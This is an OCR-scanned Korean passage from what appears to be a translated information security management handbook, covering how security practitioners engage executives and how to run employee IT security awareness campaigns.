하다면 그들이 보안성에 대한 우려를 가지고 있는가 하는것을 나는 물어 본다. 나는 이 첫 모임 
을 약 반시 간정 도로，야외 에서라면 기껏해서 45분 넘 지 않게 하려 고 한다. 높은 경 영 자들에 게 서 
는 기껏해 서 15분이 나《짜내》겠는지 …. 어쨌든 가능한껏 시 간을 내 서 이 야기하라. 
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실행 자가 항상 잊지 말아야 하는 몇 가지 가장 중요한 문제들은 다음과 같은것들이 다. 


• 경영자가 우려 하는것은 무엇 인가. 

• 조직사업을 하여 수행할것은 무엇인가. 

• 나는 무엇을 도울수 있겠는가. 장기적 인 전략계획을 토의하기 위하여 준비된 어 
떤 회의에도 참가하라. 단기적인 전술적사업토의에 준비되여야 한다. 있을수 있 
는 예산요구를 토의할수 있게 언제나 준비되여야 한다. 

실행자관리공약강령의 항목들중 하나를 다시 강조하면서 실행자들은 기술변화와 관 
련하여 자신들을 현실에 발맞추어야 한다. 기관이나 회사에 미치는 정보기술영향에 관한 
토의 에 준비 되 여 야 한다. 표 17_3에 는 실 행 자가 알아야 할 몇 가지 항목들이 소개되 였 다. 

행정관리의 측면에서 실행자는 보안방책토론에서 항상 허심해야 한다. 방책을 작성 
하거 나 수정하는것 은 실 행 자가 관여하는 가장 신중한 문제 들중의 하나이 다. 방책작성 이 
실행 자의 특정한 권한에 속하는것은 아니지 만 실행 자는 의견을 제 기하며 자기의 경험 에 
기 초하여 방책초안을 작성하게 된다. 또한 실 행 자는 방책작성 권고에 서 집 단이 존중하는 
성원이다. 특히 회사는 방책에 대하여 정기적으로 검토하는가，어떤 수준에서 그 복잡한 
구체적인 내용들이 기관의 방책에 반영되는가，실례로 방책은 누구에게 의무 또는 책임 
이 있는가 하는것을 규정 하는가，방책 이 그 준수를 계기 하는가 즉 방책 이 못을 때 리는 
《 마치》를 가지 고 있는가，방책 이 어 떻게 실행되는가 등. 실행 자는 방책의 각이한 수준 
례컨대 높은 수준(정보원천보호)과 보다 구체적 인 수준 ( WWW 의 리용방책 혹은 Web 싸이 
트회복절차)을 구별할수 있어야 한다. 

R 17-3 토의제목들 


다음의 것 을 토의 할 준비 를 하라 : 

• 총 회복비용 

• VAN 상의 EDI 로부터 VPN 에로 이동 

• 총 운영가격 

• IP 상에서의 음성전송 

• 음성인식체계 

• 무선통신망구축 

• 자체복구적인 망 

• IT 위 험 보험 

• 자료보관고구축의 효과 

• 값되물기계산 

• BCP 와 InfoSec 의 개념화 

• 가상경로기의 여유규약 
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행정관 및 상급경영인과의 만남 실행자들은 집행위원회의정토의에 참가할 준비가 되 
여 있어야 한다. 이런 기회들이 있게 되면 자신들을 잘(혹은 나쁘게) 보일수 있다. 무엇 
이 수행되였는가，무엇이 발생하고 있는가 그리고 무엇이 진행되고 있는가와 같이 중요 
한 문제를 알기 쉽게 간단히 말해야 한다. 또한 기관의 생산부문에 해당한 정보와(계획 
된) 제 출현시안 ( presentation ) 을 간단하게 준비하는것 이 중요하다는것 은 두말할 필 요조차 
없 다. 알기 싫 어 하고 기 억할수 없는것 을 경 영 자들에 게 알려 주기 위하여 애 쓰지 말아 
야 한다는것 을 명 심하라. 

중간수준경영자들과의 만남 그들과 지난번에 만난 이후 일이 어떻게 달라 졌는가에 
대 하여 주의 를 집 중하라. 경 영 자들의 견지 에서 는 자기 기 업문제 에서 무엇 이 달라 졌는가， 
실행자의 견지에서는 지속 및 보안활동에서 무엇이 변하였는가，나타난 변화들로 하여 
회복 혹은 보안우선권에서의 모든 변화들을 토론 하게 하라. 

기 관의 인사부성 원들과 좋은 관계 를 맺 는것 이 아마도 중요 할 것 이 다. 한가지 리유는 
회 사의 신입 사원지 도요강에 정 보보안소개 의 도입 을 추진시 키 자는것 이 다. 또 한가지 리 유 
는 기관의 《새》경영자들에 대하여 알도록 하자는것이다. 오늘의 종업원이 언제 경영자 
의 지위로 승진되는가 하는것을 알아 내는것도 또한 중요하다. 보다 중요한것은 기관밖 
의 성원이 언제 결원된 경영자의 자리를 차지하는가를 알아 내는것이다. 


교 육 


지 속교육프로그람은 이것 이 도달목표가 아니 라 진행과정이 라는 또하나의 홀륭한 
실례 이 다. 누구나 기 업공정 에서 거의 계속되 는 변화들과 기 업공정 을 지 원하는 기 술에 
맞다들게 되므로 기관의 모든 종업원을 계속 교육하는것이 얼마나 중요한가 하는것을 
누구나 알수 있 다. 비 록 힘 겨 운것 같기 는 하지 만 현대기 술에 의하여 발생 된 취 약성 과 
비밀의 로출로 인하여 자기의 회사와 자신을 갱신해야 한다는것을 다시 한번 강조해야 
한다. 

실행자는 신간업계잡지들을 읽어야 한다. 기업지속 및 정보보안잡지들뿐아니라 기관 
산업과 관련되는 업계잡지들을 읽어야 한다. 교육사업을 지원하는 잡지기사들은 언제나 
들고 다니 면서 기 업 관리 에 리 용될수 있게 준비해 야 한다. 또한 실 행 자는 회 복이 나 보안 
과 직접 관련된 기술의 변화에 대하여 경영자들에게 알려 주어야 한다. 이 기사들은 주 
로 중간수준의 경영자들이 읽도륵 하는것이 여기서는 필수적이다. 책임경영자는 우선 문 
제 를 제 시 하고 보충정 보에 서 그 문제 가 노는 역 할에 대 하여 명 백하게 리 해해 야 한다. 그 
다음에 상급경 영 자들에게 지 원문건(기사 등)을 제공하는것 이 가장 효과적 이 다. 

또하나의 《 교육》형 식은 전자우편경 로를 통하여 실현하는것 이 다. 과업을 계 획하는 
InfoSec 혹은 BCP 와 관련된 기관안내전자우편을 보낼 때에는 해당한 경영자들에게 복사 
본을 보내 라. 

위 험 관리주기 (그림 17 — 1) 에 대 한 토론 (검 토) 에 준비 되 여 있 어 야 한다. 즉 실 행 자가 
《이 계획은 완성되였다.》라고 말해야 할 때가 올것이다. 실행자는 위험관리주기에 대하 
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여 어느때이든 빨리 요약할수 있게 준비되여 있어야 한다. 

1단계 기관의 환경 혹은 재산을 정의 혹은 갱 신하라. 

2단계 기업영향 혹은 위험분석을 수행하라. 

3단계 기관의 현 운영상태 그리고 재산에 대한 영향에 기초하여 방책，지침，표준 
및 절차를 개 발 혹은 갱 신하라. 

4단계 회 사의 임 무와 목적 을 지 원하는 방책 등을 강화하기 위하여 체 계 또는 공정 
을 설계하고 실현하라. 

5단계 그 체계들을 행정적으로 실현하고 유지하라. 

6단계 체계와 기 업공정 을 시 험하며 그것들을 검 열하고 그것들을 탐색 함으로써 바라 
는 목표를 달성할수 있게 하라. 그리 고 시 간이 흘러 감에 따라 이 주기 는 반 
복되여야 한다. 바로 이때 모든것이 변하였으며 회사가 환경과 자기 재산을 
재평가할 필요가 있다는것이(람색，시험，검열을 통하여) 결정된다. 



그림 17-1. 위험관리주기 


대부분의 회사들은 년간 및 반년간의 종업원회의들을 말단수준(실례로 부서모임)에 
서 정기적으로 가진다. 실행자는 이런 회의들의 의정에 상정될 중요한 항목들을 장악해 
야 한다. 실행자들은 될수록 기관안에서 인정을 받아야 할 문제들을 항목으로 설정하여 
의정 에 제 기하게 된다. 그렇지 않으면 최소한 경 영 자들이 종업 원들에게 말하려 고 할 때 
그들에게 이 런 항목들을 보장하라고 요구하여 야 한다. 
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경영자의 책임성 


실행자는 경영자에게 다음과 갈은 정보(교육)의 일부 항목을 제공할 시간을 구체적 
으로 선택하여야 한다. 그러나 여기서는 다시 지속/보안프로그람의 성과여부가 경영자의 
리해와 지원에 좌우된다는것을 강조할 각오를 해야 한다. 

• 모든 종업원들이 기관의 어떤 자원에 접근하기에 앞서 IT 사용자의 책임성을 알 
도록 하는것 

• 솔선수범 : BCP 혹은 InfoSec 제 안에 대 하여 적 극적 으로 눈에 띄 게 지 원하는것 

• 정보를 보호하고 방책을 개선하는 사람들에 대한 평가와 보수(경영인이 이런것을 
하려고 하지 않는다면 적어도 실행자들이 그것을 하게 허락하도록 납득시키라.) 

모든 종업원들을 망라시킬 때 그것이 경영자의 교육에 주는 영향을 스쳐 보내지 말 
라. 프로그람에 종업 원을 망라시 키 는 사업 을 장려하여 야 한다. 자기 들의 참가가 정 보보안 
및 회복프로그람의 성과에 의의 있는 요인으로 된다는것을 알면 종업원들은 의식을 크게 
높이게 될것이다. 종업원들은 자기들이 기관에서 중요한 역할을 한다는것을 인식하게 될 
것이다. 그러나 무엇보다도 중요한것은 말단단위의 종업원들부터 올라 가면서 먼저 프로 
그람보장사업 에 참가시키 는것 이 다. 경 영 자가 회 복 혹은 보안문제 들에 대 하여 종업 원들로 
부터 듣게 될 때 그들은 회 사를 위한 사업 에 관심 (보다 큰 관심)을 가지 게 될 것 이 다. 

추동요 인 


여기서는 경영자들을 행동에로 추동하는 문제들 즉 적어도 경영자들이 지속적회복 
및 정 보보안계 획 과 반복적 인 사업 들을 지 원 하도록 추동하는 문제 들에 대 하여 재학습하게 
된 다. 

일부 사람들은 관리자를 추동하는 주요요인이 돈이라고 한다. 기관의 소득이 높아 
지 면 경 영 자들은 흔히 기태한다. 반대 로 기 관에 재정적부담을 주고 투자에 대 한 리윤을 
기 대할수 없는 경우에 경 영 자들은 훨씬 더 신중해 질것 이며 사업 에 대 한 평 가와 인정 을 
하려는 용기가 나지 않게 될것이다. 재정문제외에도 경영자들이 기업지속 및 정보보안계 
획을 지원하도록 추동하는데는 여러가지 방도들이 있다. 그러나 가장 많이 사용된(그리 
고 람용된) 방법 은 FUD (두려 움，불확신 및 의 심)이 다. FUD 는 더 구체 적 으로 보면 고위당 
국의 지시나 명령의 측면들> 례로서 회사의 관리리사회 혹은 주주들의 명령을 들수있다. 

보충적으로 법적，조직적 및 계약적의무에 응해야 할 요구들은 경영인들에게 더 큰 
인상을 주는것이다. 관리의 견지에서 적극적인 요인으로 되는것은 생산성을 높이는것이 
다. 생산성이 높지 못한 경우에는 적어도 정보보안과 기업사고방지계획이 생산의 정상화 
에 도움이 되리라는 확신이 그런 추동요인으로 된다. 다행히도 많은 실행자들은 관심을 
불러 일 으키 는 추동요인들을 성 과적 으로 리용하기 시 작하였 다. 다음 부분들에 서 는 구체 
적 인 추동요인들과 함께 모든 추동요인들을 고찰하게 된다. 
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인 한몫을 로출시키는것을 극복하는 문제를 훌륭하게 돕기 위하여 모든 주요정보기술계 
획에 의무적으로 참가하게 된다. 믿음직한 접근관리조종과 자동기업공정에 대한 신속하 
고도 효과적인 회복력량도 계획화하여야 한다. 기관안에서 정보기술지원을 받는 기업공 
정을 개발하거나 개조할 때 접근조종 및 회복계획은 모든 계획에 의무적으로 포함되여야 
한다. 각이한 기관들은 중요한 성과자료를 결정하는 각이한 기준들을 가지고 있다. 경영 
인들이 종종 고려하게 되는 문제는 회사가 자기의 중요한 성과자료를 공개하려고 하는가 
하는것 이 다. 오늘의 발전하는 기술환경 에서 는 계 획개 발생명주기의 계 획화가 완전하지 못 
할 경우에는 회사의 중요한 성과자료를 쉽게 고려할수도 있게 된다는것이 현 실태이다. 

응당한 관심 

오늘날의 기업세계는 기업공정들에 제공되는 지원정보자원에 철저히(거의 완전히) 
의존하게 된다. 실행자는 그런 지원정보자원을 보호통제하게 되며 필요한 경우에는 이전 
자원들을 리용할수 있다는것을 기관에 납득시키기도 한다. 이런 사정으로 실행자는 보호 
대 사용상 편의, 손실위험 대 보안통제 비용의 균형을 효과적으로 맞추어 야 할 임무를 맡 
게 된다. 위험분석공정(주관적인)에 지장을 주는 불일치에 기초한 보호 및 회복성《최 
소》요구를 경영자들에게 납득시키는것과는 반대로 기관들에서 제기되는 이런 희망들에 
대한 리성적인(접수될수 있는) 균형을 결정하는데 응당한 관심을 돌리는것이 보다 생산 
적 이 라는것 을 많은 실 행 자들은 알게 되 였 다. 

어떤 회사에서든지 응당한 관심이라는 고려항목을 요약한다면 다음과 같다. 경영자 
들이 (1) 보안통제 및 회복계획들이 류사한 기관들에서 보게 되는 그런것들과 비교될수 
있게 전개되 였 다는것 과 (2) 그들이 또한 기 업 지 속 혹은 정 보보안에 투자를 일정하게 하 
였다는것 을 제 시할수 있는가 또한 기 관에서 그렇게 하지 않는 타당한 기 업 적근거를 문건 
상에 밝혔는가. 

법적，규정적 및 계약적의무조항 

일정한 형 태의 의무조항이 규정 적 인 의 무조항(증권 및 교역위 원회，련방재정 기 관심 
사리사회 혹은 보건재정국)이 건，법적의무조항 (1996 년 보건보험공용 및 책 임 관계법 ， mS 
기 록보존법 그리 고 각이한 주 및 련방 콤퓨터보안 및 범죄관계 법)이 건，회 사리 사회 의 지 
령이건 혹은 검열원보고에 지적된 사항에 기초한 건의 안들이건 관계없이 모든 기관들이 
다 책임진다. 응당히 집행경영자는 기업에 영향을 주는 규정과 규칙에 대하여 인식하게 
해야 한다. 이러한 기업영향에 익숙해 져 있게 되면 실행자는 그로부터 혜택만을 입게 
될수 있다. 어느 회사들에서든지 실행자가 이런 규정과 규칙들에 대한 경영자의 리해정 
도를 파악하고 실행 자에 게 설명하여 줄 특히 정 보기 술의 지 원을 받는 기 업공정 의 실현에 
그것 이 어떻게 영 향을 주는가와 관련하여 설명하여 줄 기회 가 있을것 이 다. 

모든 실행자들은 큰 정보기술계획의 계약명세서를 작성하는데 참가하거나 혹은 적어 
도 의견이라도 제출하여야 한다. 기관들은 전자상업거래가 기업을 수행하는 정상적인 한 
부분이 라는것을 기대하기 시작하였다. 이런 견지에서 모든 기업동업자의 보안 및 비상사 
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고대 책에 대한 보안 혹은 재해복구평가를 외부계 약당사자들이 실제로 수행 하도록 허 락하 
는 계약상 요구에 직면하게 될수도 있을것이다. 실행자는 회사의 망에 대하여 접수할수 
있는 수준의 내부검토를 진행할 준비가 되여 있는가. 실행자는 경영자의 방조자로서 우 
선 운영환경에 실제적인 보호범위를 정확히 판단하기 위한 요구를 기업동업자들이 계속 
확장할수 있게 하며 자기 기관안에서 접수될수 있는 구체적인 계약조항들을 보장할수 있 
게 준비한다. 

생산성 

기관이 봉사를 목적으로 한다면 다시 말하여 고객들과 협력자들에게 각이한 수준의 
봉사를 보장하려고 한다면 접근조종은 필수적인것으로 된다. 체계개발，실현 및 유지를 
잘하면 오직 해당한 사용자만 그 체계에 접근하게 할수 있고 사용자가 작업하려고 할 때 
리용하게 할수 있다. 

오늘의 기술적작업환경에서 대부분의 경영자들은 반드시 정보기술과가 최신의 실시 
간적인 기술대책들을 실시하고 갱신하여 나가야 한다고 주장할것이다. 비루스를 자동적 
으로 제거하지 않고서는 정보자원의 기관적리용을 할수 없다는것은 의심 할바 없다. 비루 
스방지를 잘하고 갱신하면 종업원들의 생산성은 적어도 안정되게 될것이다. 

암호화가 생산성을 높이는가에 대한 견해는 각이하다. 그러나 암호화가 기업을 살린 
다는것을 부정하는 경영자는 거의 없다. 암호화는 공유되는 통신만이 엑스트라네트이건 
인트라네트이건 혹은 인터네트이건 관계없이 그것을 통하여 송신되는 사적비밀에 대한 
믿음과 정보의 비밀성을 더욱 확고하게 하여 준다. 기업은 암호화의 비밀성에 대하여 담 
보할것 을 요구하고 있으며 또 계속 요구할것 이 다. PGP 와 수자식서 명의 우월성 을 리용하 
는 대렬이 계속 늘어 나고 있으며 비밀엄수를 요구하거 나 신속정확성을 요구하는 회사의 
정보가 수신인 한사람만이 해당한 정보를 볼수 있도록 신뢰성 있게 공개망으로 송신될수 
있는 보다 큰 담보가 이루어 지고 있다. 

어 떤 콤퓨터 사고에 도 대 처할수 있도록 기 관들의 기 초기 술토대 가 마련되 고 있다. 적 
극적 이 고 믿 음직한 대 응책 을 해 결 함으로써 기 관들에 서 는 랑비시 간을 대 폭 줄이 고 생 산성 
을 높여 나갈수 있는 확고한 담보를 쌓고 있다. 

경영자를 추동하기 우 I 한 협력 

실 행 자들은 검 열 자가 경 영자로부터 신뢰 를 획 득하는데 서 자기 들과 동맹 자라는것 을 
느진다. 그러 나 어떤 정황도 검열자의 견지에서 보아야 한다는것을 잊지 말아야 한다. 다 
시 말하여 모든 임무공정들(지속성공정과 보안공정까지 포함하여)이 무결성이 담보되는 
공정으로 되도록 하는것이 그들의 임무라는것이다. 이런 전제는 기업과정의 통제수단들 
을 개 발하기 위한 의 견들에 검 열 자를 인입 하려 고 시 도하게 될 때 리해 에서 불일 치 가 있 
을수 있다. 그러나 동시에 실행자들이 회사안의 검열성원과 토론하여 협력관계를 조절하 
려는것은 아주 좋은 구상이다. 내부검열과 보조를 맞출 때만이 기관안에서 성과를 거둘 
수 있으며 개선할수 있는 문제와 관련한 중요한 정보를 엄을수 있게 될것이다. 
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또한 실행자는 법관계 일군들과 동맹 자가 될수 있으며 또 이와 반대 로 법관계 일군들 
이 실행자와 동맹자로 될수 있다. 이런 《추동요인》은 이 편람의 이전 판들에서 지적된 
만큼 이 장에서는 언급하지 않았다. 


요 약 


경영진의 말 당신은 이것을 자체로 할수 있지요，당신은 전문가가 아닌가요? 

실행자의 대답 이런것은 언제나 협동해야 할 일입니다. 저의 견해에 의하면 저는 아 
무리 알려고 해도 그 일을 실지 수행하는 사람들만큼 세부적 인것 
을 절대로 할수가 없습니다. 

실행자들은 자기들의 1차적인 과제가 경영자의 1차적인 과제로 되게 해야 한다. 그 
러나 더 중요한것 은 경영자의 1 차적 인 과제 가 실 행 자의 1 차적 인 과제 로 되게 하는것 이 다. 
실행자는 경영자의 우려와 경영자가 어떤 항목에 주의를 돌릴것인가를 아는것이 중요 
하다. 

실행자는 기관안에서 기업촉진자로 인정 받기 위하여 노력해야 한다. 일을 잘하는 
실행자는 계획림의 중심인물이 되여 항상 없으면 안되는 그러한 사람，그에 의거해야만 
충돌문제의 성과적인 해결을 볼수 있는 사람인것이다. 그러한 충돌문제의 례를 들어 본 
다면 명백히 분할화되고 프로그람적으로 조종화된 효과적인 자동업무공정과 사용자의 사 
용상 편의와의 충돌을 들수 있다. 

《고객은 언제나 옳다.》이렇게 말하는것은 흔히 써오는 에둘러 말하기이다. 그러나 
모든것을 고려해 볼 때 이것은 실행자에게 특별한 의의를 가지고 있다. 경영자가 지지할 
수 없는 결정과 행동을 실행자가 내밀수 있는 정황은 드물다. 실행자가 기업을 알려고 
애 쓰고 기관의 기업과정들에 영향을 주는 업계의 변화에 보조를 맞추어 갱신하면 그는 
고객이 요구하는것을 알게 될것이다. 즉 실행자는 경영자와의 공약을 유지하는데서 성과 
를 거두게 될것이다. 
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제 1 8장. 보안의식의 계발 


쑤즌 디 핸취 

정 보기 술 ( IT ) 은 우리 의 일상생 활의 모든 면에서 뚜렷 이 안겨 온다. 너 무도 명 백하므 
로 많은 경우에 그것을 전혀 느끼지 못할수 있다. 전자우편 혹은 육성우편이 없이 기업 
을 운영 한다고 생 각해 보라. 손으로 보고서 를 쓰고 후에 전자타자기 를 리용하여 그것 을 
타자하면 어떻게 되겠는가. 콤퓨터기술과 공개결속된 통신망은 분야나 기업의 특수한 요 
구에 관계없이 모든 기관들의 핵심적구성분인것이다. 

정 보기술은 정부와 사영분야들에서 전례없 이 많은 정 보량을 창조，가공，저축 및 전 
송을 진행할수 있게 한다. 이 정 보흐름을 다루기 위하여 건설된 IT 하부구조는 산업 운영 
의 전일적인 한 부분으로 된다. 사실 대부분의 기관들은 자기 기관의 생존이 자기들의 정 
보체 계 에 달려 있 다고 생 각한다. 정 보체 계 에 대 한 이 런 의 존은 사무를 능률적 으로 수행하 
는 기 관의 능력 을 위 험하게 만들수 있 는 행 동으로부터 하드웨 어，쏘프트웨어 와 같은 물리 
적 자산들 그리 고 이 것 들이 가공하는 정 보들을 보호하도록 해 야 할 필요를 제 기하였 다. 

여러 IT 보안보고들은 기업이 10여일간 자기 자료에 접근하지 못하면 그것은 경제적손실 
로부터 재정적회복을 할수 없다고 평가한다. 

정보기술은 급속도로 발전하지만 취약성과 위험에 대해서는 사용자들에게 별로 알려 
주는것 이 없 다. 1999년 3월 콤퓨터보안연구소소장 Patrice Rapalus 는 정 보시 대 에 대 처 해 
나가려 는 회 사들과 정 부기 관들에 서 는 정 보체 계보안전문가들의 채 용과 양성 에 더 많은 자 
원을 돌려야 할것 이 라고 하였 다. 이 에 대 하여 좀 더 보면 정 보체 계보안전문가들을 더 양 
성할뿐아니 라 정 보체 계 에 접 근하는 모든 종업 원들이 사용하는 IT 체 계 에 있을수 있는 취 
약점들과 위협요소들을 잘 알며 그들이 정보보호에 도움을 주자면 어떻게 해야 하는가를 
알도록 하여 야 한다. 

종업 원들 특히 IT 체계말단사용자들은 일정한 실행 에 의하여 생 기는 보안결과들에 대 
하여 누구보다도 모른다. 대부분의 종업원들에게 있어서 IT 체계는 될수록 빨리 될수록 
효과적 으로 작업 과제 를 수행하는 도구로 된 다. 다시 말하여 보안은 필수적 인것 이 라기 보 
다 장애물로 간주된다. 그리하여 정보보호에 적극적 으로 참가하지 않을 때 빚 어 지는 위 
험과 결과에 대하여 알려 주는 IT 와 관련된 정보를 모든 기관들에서 종업원들에게 보급 
하는것은 절박한 문제로 된다. 사실 법 (1987 콤퓨터보안법)은 련방기관들이 정보체계의 모 
든 말단사용자들에 게 보안의 식화정보를 보급할것 을 요구한다. 

종업 원들은 IT 체 계 와 그들이 처 리하는 정 보의 보안을 실현하는데 서 가장 중요한 요 
인중의 하나로 된다. 많은 실례들에서 보게 되는바와 같이 IT 보안사고들은 IT 보안방책과 
절 차에 그들이 주의 를 돌리 지 않고 모르고 있는데 로부터 종업 원들이 범하는 부주의 의 결 
과이 다. 때문에 안전교양을 받고 숙련된 종업원들은 정보체계의 효과적 인 운영과 보호에 
서 중요한 요인으로 될수 있다. 종업원들이 IT 보안문제에 대하여 알고 있다면 그들은 사 
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고를 예방하고 조기적발하는 제일방어선으로 될수 있다. 또한 모든 사람들이 IT 보안을 
념 려하여 관심 을 모으면 자산과 정 보를 그만큼 더 쉽 게 더 효과적 으로 보호하게 될 수 
있 다. 

정 보의 비 밀성，무결성，리용성 을 보호하기 위 해서 는 모든 기 관들이 망라된 모든 개 
별적사람들로 하여금 자기의 책임을 자각하도록 하여야 한다. 이를 위하여 IT 체계를 보 
호하는데 필요한 방책과 절차들을 종업원들에게 잘 알려 주어야 한다. 그러므로 정보체 
계의 모든 말단사용자들은 IT 보안의 기본문제들을 알아야 하며 일상사업에서 홀륭한 보 
안습관을 세울수 있어야 한다. 상급경영인으로부터 과업을 받으면 우선 보안의식화과정 
안의 목적 을 정 확하게 규정해 야 한다. 일 단 목적 이 세 워 지 면 리용할수 있 는 실 행안을 
포함하여 내용을 정해야 한다. 이 과정에 고려해야 할 기본요인들은 장애를 어떻게 극복 
하며 저 항에 어 떻게 대 처하겠는가 하는것 이 다. 마지 막단계는 성과를 평 가하는것 이 다. 이 
장에 서 는 IT 보안의 식화과정 의 개 발단계 들에 대 한 고찰에 기 본을 둔다. 

IT 보안의식화과정의 첫째 단계는 책임경영진으로부터 공약을 받아 내는것이다. 

목표설 정 


보안의 식화과정내 용을 개 발하기 에 앞서 목표 또는 목적 을 세 우는것 이 급선무이 다. 
목적은 소박하게 〈〈모든 종업원들은 자기들이 리행해야 할 기본보안책임을 알아야 한 
다.》라고 하거 나 《 기 관에 서 당하는 IT 보안위 험 에 대 하여 모든 종업 원들이 의 식하도록 
하며 종업원들미 위험을 좌절시키고 IT 체계를 보수하는데 중요한 관심을 가지도록 추동 
한다.》라고 하면 된다. 어떤 사람들은 아래에서 보는바와 같이 더 구체적인것을 세울 필 
요가 있다고 할수도 있다. 

종업원들은 다음과 갈은것을 알아야 한다. 

• 물리적자산과 기억된 정보에 대한 위협 

• 기밀(혹은 비밀)정보의 식별 및 보호방법 

• 열린 망환경 에 대 한 위협 

• 정보의 보관，표식，전송방법 

• 저작권위반 또는 사적비밀관계법과 같은 준수해야 할 련방밥들 

• 의심되는 사고이건 확실한 사고이건 모든 보안사고들을 보고 받아야 할 사람 

• 의무적으로 집행해야 할 기관 또는 부서의 해당 방책들 

• 전자우편 혹은 인 터네 트방책 과 절 차 

보안의 식화과정 의 목적 을 세 울 때 기 관의 총적 과업 과 목적 들을 반영 하고 지 원해 야 
한다는것을 명심하라. 바로 이 시점 이 정보총괄책 임 자 ( CIO : Chief Information Officer ) 또 
는 다른 책임 및 상급경영자들에게 실태보고를 해야 할 적절한(혹은 필요한) 때이다. 
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내용 결정 


IT 보안의 식화과정은 IT 체 계 들의 위험성과 취 약성의 정도를 반영해 야 하며 종업 원들 
에 게 그들이 창조，처 리，전송 및 보관하는 정 보를 보호해 야 할 필요성 을 상기시 켜 야 한 
다. 원래 IT 보안의 식화과정 의 초점 은 종업 원들의 보안자각을 높이 는것 이 다. 

내용의 수준과 류형은 기관의 요구에 의존된다. 본질상 종업원들에게 그들이 보호해 
야 할것은 무엇 이며 그것을 어 떻게 보호하며 기 관들에 IT 체 계보안이 얼마나 중요한가 하 
는것을 알려 주어 야 한다. 


실현 방도 


보안의 식화자료를 전수하는 방법 과 방안들은 성 희 롱이 나 기 업륜리 에 대 한 종업 원교 
양자료전수와 매 우 류사하다. 사실冬 이 러하지 만 전통과 결 별하고 격 식 에서 벗 어 날 때 
가 온것 갈다. 다시 말하여 새 로운것을 시도할 때 가 온것 갈다. 

종업 원들에 게 사상을 알려 주며 훌륭한 콤퓨터 보안습관을 장려할수 있는 적 극적 이 고 
흥미 있 고 분발시키 고 추동하는 방법 들을 생 각해 보라. 

의 식 화과정 의 성 과는 여 러 가지 인기 있 는 자료와 기 교로써 많은 사람들을 쟁 취하는 
능력 에 있 다. IT 보안의 식화자료와 기 교들의 실례 를 다음에 제 시한다. 


• 포스터 

• 충동을 주며 눈길을 끄는 구호제시 

• 비 데 오테 프 

• 교실강의 

• CD-ROM 또는 인트라네트접근과 같은 를퓨터를 통한 보급 

• 소책자 또는 선전물 

• 추동하는 구호가 있는 펜，연필，열쇠줄(임 의 의 류형 의 장신구) 

• IT 체계를 보호하는 내용이 있는 게시지 

• 문파 게시판에 붙이는 풀종이 

• 기업내의 소식지 혹은 해당 부서의 통보서에서 월 혹은 분기마다 만화 혹은 기 
사를 싣는것 

• 특정주제 의 불레 찐(이 경 우에 는 보안경보) 

• 보안문제와 관련한 월간전자우편통고 혹은 보안권고안의 전자우편방송 

• 콤퓨터화면에 나타나는 보안구호 또는 가입전통보문 

• 추동물로 식품을 나누어 주기, 례건대 작은 뱀모양의 사탕을 담은 사탕통들을 
나누어 준다. 《 XYZ 에 비 루스가 공격 개 시한다》이 라는 제 목을 단 카드를 꾸레 
미 에 붙이 라.《 망에 서 꿈틀거 리 는 모든 비 루스를 죽이라-당신의 모든 항비 루스 
쏘프트웨어들이 움직이도록 하라》와 갈은 묘한 통보문을 주라. 
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Web 싸이트주소 : http :// awarenessmaterials . homestead . com / 에서는 다음과 같은 선택항목들을 목록 

에 주고 있다. 

• 《우리 환자의 정보를 보호하는것 이 건강이다. 우리 정보를 보호하는것 이 건 
강이다.》라는 표어를 불인 응급치료함 

• 《누가 우리 정보들을 책임지고 있는지 보라.》라는 구호를 붙인 거울 

• 《당신의 통과암호는 이 치솔과 같다 : 그것을 정기적으로 리용하며 자주 교 
체 하라. 그리고 그것을 다른 사람과 같이 쓰지 말라》라는 구호를 붙인 치솔 

• 《보안에 대하여 생각하라.》라는 구호와 교체 할수 있게 된 휘장받치개 

• 《당신은 훌륭한 보안열쇠이다.》라는 구호를 불인 열쇠형식의 자석 

• 《정보보호에 언제나 비쳐 주라.》라는 구호가 있는 손전지 

의식화과정에서 또하나의 중요성과 요인은 의식화과정은 끝나지 않는다는것 즉 의식 
화깜빠니 야는 기 본사상을 계 속 반복하여 야 한다는것 을 기 억 하는것 이 다. 주려 는 사상이 
아주 중요하다면 더 자주 반복하여 야 한다. 그리고 매번 다르게 반복하여야 한다. IT 보안 
의식화는 계속되는 운동이기때문에 모든 교양대상들의 관심 이 유지되게 하자면 창조성과 
열성이 요구된다. 의식화자료는 IT 보안이 기관뿐아니라 모든 종업원에게 다 중요하다는 
분위 기 를 조성해 야 한다. 또한 IT 보안방책 과 행 동준칙 을 준수하는데 사람들의 흥미 를 불 
러 일으켜 야 한다. 

의식화과정은 갱신되여야 한다. IT 보안방책 이 변경되는 경우에는 종업원들에게 통지 
하여 야 한다. 최 신정 보를 전송하기 위한 기 술수단을 설 치하는것 은 필 요하며 또 유익한것 
이다. 실례로 다음번 《라브바그》비루스가 밤새 순환하였다면 체계경영자는 가입전통보 
문을 모든 워크스테이션들에 보내 주어야 한다. 기계를 시동시킬 때 사용자가 보게 되는 
첫 항목은 무엇을 찾고 무엇을 열어야 하는가와 갈은 체계보안정보이다. 

마지 막으로 보안의 식화깜빠니 야는 단순해 야 한다. 기 관들에 서 의 식 화깜빠니야를 벌 
리 는데 자금을 너 무 많이 쓴다든가 복잡하거 나 지 나친 기 술을 리용할 필요는 없 다. 종업 
원들이 정 보를 쉽 게 접수하게 하며 또 그것을 쉽 게 리해하도록 해 야 한다. 

보안의식화과정은: 

• 경영진이 솔선 수범으로 지원하고 이끌어야 한다. 

• 단순하고 직선적 이여 야 한다. 

• 적극적이고 주동적이여야 한다. 

• 끊임 없는 사업으로 되여야 한다. 

• 가장 중요한 사상을 반복해 야 한다. 

• 흥취 가 있어야 한다. 

• 적당한 경우에 유모아적 이여야 하며 따라서 기 억에 쉽게 남는 구호가 되여야 한다. 

• 모든 종업원들에게 위험이 어떤것인가와 체계보호를 위한 임무를 알려 주어야 한다. 

어떤 기관의 경우에는 의식화과정의 설계와 개발을 전문자격을 가진 업체에 외탁하 
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는것이 필요한(혹은 실행할수 있는) 선택안일수 있다. 기관의 요구를 들어 줄수 있는 가장 
적합한 업체를 찾기 위하여 인터네트에서 제품과 봉사를 자세히 찾아 보고 다른 사람들과 
만나서 그들의 경험을 들어 볼수 있다. 그리고 지난 기간의 경험을 목록화하여 가지고 있 
으며 제기된 목표에 대한 해결책을 개괄하여 주는 제안을 판매자에게 요구할수 있다. 

장애 극복 


전체 종업 원규모의 사업 에서 처 럼 보안의 식 화깜빠니 야는 고위 경 영 자의 지 원을 받아야 
